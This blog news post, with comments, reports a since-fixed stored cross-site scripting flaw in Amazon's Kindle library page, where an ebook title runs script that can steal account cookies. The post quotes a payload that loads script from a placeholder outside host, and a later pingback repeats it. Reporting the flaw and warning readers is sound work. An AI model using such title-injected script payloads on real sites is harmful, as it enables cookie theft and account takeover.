Your Amazon Account Can be Hacked via a Kindle eBook

Amazon might not have a security issue at Audible, but they do have one on their main website.

Update: And it has been fixed.

A security researcher has reported, and I can confirm, that Amazon has a security hole on the "Manage Your Kindle" page - one which is relatively easy to fix.

Thanks to this hole, a hacker can gain access to a victim's Amazon account simply by getting the victim to download an ebook whose title has been tampered with to include a script:

Once an attacker manages to have an e-book (file, document, ...) with a title like

<script src="https://www.example.org/script.js"></script>

added to the victim's library, the code will be executed as soon as the victim opens the Kindle Library web page. As a result, Amazon account cookies can be accessed by and transferred to the attacker and the victim's Amazon account can be compromised.

I've tried it, and it does work. I saw something similar to the image which the hacker posted to his blog.


As a result, I would urge caution against buying or downloading ebooks from untrustworthy sources - for the near future, at least. I expect Amazon will fix this problem shortly; that's what they did when it was first discovered last fall.

No, this is not a new story, though it is only now coming to light. The German ebook blog AlleseBook.de broke the story earlier today when they reported on the hacker who discovered this issue - and, more importantly, provided an ebook which proves the hack works.

Benjamin Daniel Mussler writes that he discovered this security issue last October. He notified Amazon in November, and they fixed it 4 days later. That is great, but then Amazon reintroduced the security hole earlier this year when they launched the new version of the "Manage Your Kindle" page.

As of the time I wrote this post, Mussler's hack still worked. There's even an ebook which you can use to test the hack yourself, if you like. I would recommend against it, but it is up to you.

On a related note, if you're worried about being hacked, there is a simple rule you can follow to keep yourself safe.

I have a rule against downloading apps from questionable websites, one which I have long since applied to Epub ebooks (because they can contain JavaScript) and PDFs (because they can hold entire apps). Now it would seem that rule needs to be expanded to include Kindle ebooks as well.

image by Pitel

Nate Hoffelder

Nate Hoffelder is the founder and editor of The Digital Reader: He's here to chew bubble gum and fix broken websites, and he is all out of bubble gum. He has been blogging about indie authors since 2010 while learning new tech skills at the drop of a hat. He fixes author sites, and shares what he learns on The Digital Reader's blog. In his spare time, he fosters dogs for A Forever Home, a local rescue group.

24 Comments

  1. […] Original article on The Digital Reader […]

  2. R, 15 September 2014

    To prevent losing personal info because of hacking, I don’t provide any real info to Amazon (except my credit card no.). I only enter my credit card no. when I want to buy a book (which I seldom do). After buying it, I delete the no. It is just always dangerous to save any personal info online.

    1. Skeptical, 21 September 2014

      “I don’t provide any real info to Amazon (except my credit card no.)” I applaud your caution, but you should be a bit more realistic about it… For one, you also had to give your name and your billing address, or otherwise your CC wouldn’t have gone through. But more importantly, note that even in this very limited case, there is no report that credit card numbers were leaked: this should not be a surprise, because you can’t even see your *own* credit card numbers on Amazon.com (go take a look). So if someone “takes over your account”, they *still* can’t see what your credit card numbers are. They also cannot change the shipping address that your account sends to, because this requires retyping your credit card number… which they don’t have. Likewise, they do not gain access to your password (this, too, is not shown to you on amazon.com).

      Do not confuse a very limited exploit – recall this required you to download an ebook to your Kindle that has “.js” in it, which is kind of like saying that email is very dangerous if you click on attachments willy-nilly – with the kind of massive data breach that Home Depot and others have had.

  3. dn, 16 September 2014

    Have always had a concern about the lack of security/protection on the Kindle. So with my Kindle+keyboard model, practice has been to download to computer and thence by USB cable to the device.

  4. […] Ebook as Hacker Tool (The Digital Reader) Hackers have found a way to use ebooks to hack Amazon accounts. It’s an easy-to-fix loophole in Kindle security but scary nonetheless. […]

  5. […] a writeup by someone demonstrating the researcher’s proof of concept test on themselves, passing with […]

  6. […] was purchased instead of pirated. That’s where the problems like attackers getting access to your Amazon account — which bears your address, and credit card information — come […]

  7. Kindle security flaw can be exploited by hidden codes in e-books | Sprestige.com, 16 September 2014

    […] Via: The Digital Reader […]

  8. […] information | The Digital Reader | B.FL7.DE On Genbeta | Some basic computer-security concepts you should […]

  9. McGroarty, 16 September 2014

    This is potentially made worse by the fact that most of the cookies on Amazon’s site are not flagged Http-only. If a cookie is not flagged Http-only, it can be read by scripts. I see two different session tokens on my account, one of which is protected and one of which is not.

  10. […] Read the full story at The Digital Reader. […]

  11. […] According to The Digital Reader, a hacker can gain access to your Amazon account by simply getting you to download an ebook file, which itself was hacked to include a script like <script src="https://www.example.org/script.js"></script> in the title. […]

  12. […] your Kindle is vulnerable to hacking by dodgy ebooks. And by “hacking,” I mean, “Your account gets stolen.” Amazon, tell me […]

  13. Tom Semple, 19 September 2014

    Apparently Amazon has patched this up. I wonder if anyone’s tried a similar hack with Google Play Books. One is able to upload ePub files, and even read them in a browser, which might present a big surface area to attack. Don’t remember if Google’s ePub3 support includes JavaScript support.

  14. […] Kindle ebooks from dubious sources aka anywhere other than Amazon, watch out. A security researcher has discovered a security hole in the “Manage Your Kindle” page on Amazon’s website that outs […]

  15. […] according to ‘The Digital Reader’, a hacker can gain access to the Amazon account simply by downloading a file from […]

  16. Tuesday 16th of September, 24 September 2014

    […] Full Story at The Digital Reader […]

  17. […] this happen, and I can also tell you that Benjamin Daniel Mussler, the security researcher who found the security hole on Amazon.com, has also tested this at my request and saw it with his own […]

  18. […] in that article he also references an Amazon vulnerability, that was closed, opened again when Amazon made a site update, and then subsequently closed again, […]

  19. […] Your Amazon Account Can Be Hacked Via a Kindle eBook, via author and heckuva guy Nigel Blackwell. […]

  20. […] ‘walled garden’ (Zittrain 2008). In reality, hackers are able to surpass these boundaries. A flaw was found in Amazon’s walled garden through the ‘Manage Your Kindle’ page which enables the hacker to […]

  21. […] (via Digital Reader) […]

  22. […] “Your Amazon Account Can be Hacked via a Kindle eBook” on The Digital Reader […]
